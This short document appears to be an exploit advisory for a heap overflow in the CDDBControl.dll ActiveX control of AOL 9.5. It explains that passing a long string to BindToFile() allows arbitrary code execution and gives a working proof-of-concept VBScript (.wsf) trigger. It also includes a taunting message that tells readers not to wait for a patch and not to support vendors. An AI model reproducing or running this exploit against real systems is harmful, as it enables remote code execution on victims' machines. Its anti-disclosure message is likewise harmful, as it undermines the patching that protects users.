Product:
AOL 9.5
Vulnerability:
ActiveX - Heap Overflow
Discussion:
Vulnerability is in Activex Control ("CDDBControl.dll")
Sending a string to BindToFile() , triggering the vulnerability.
Successful exploitation allow remote attackers to execute arbitrary code.
Credits:
Celil 'karak0rsan' Unuver and murderkey
from Hellcode Research
tcc.hellcode.net
forum.hellcode.net
L4stW0rdZ: "hi francis, do you think we forget you ??? ofcourse not, dont wait patch, dont support vendors
and security industry ...." - mkey
---------------
PoC .wsf script:
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />
<script language='vbscript'>
arg1=String(4000, "A")
arg2=1
target.BindToFile arg1 ,arg2
</script>
</job>
</package>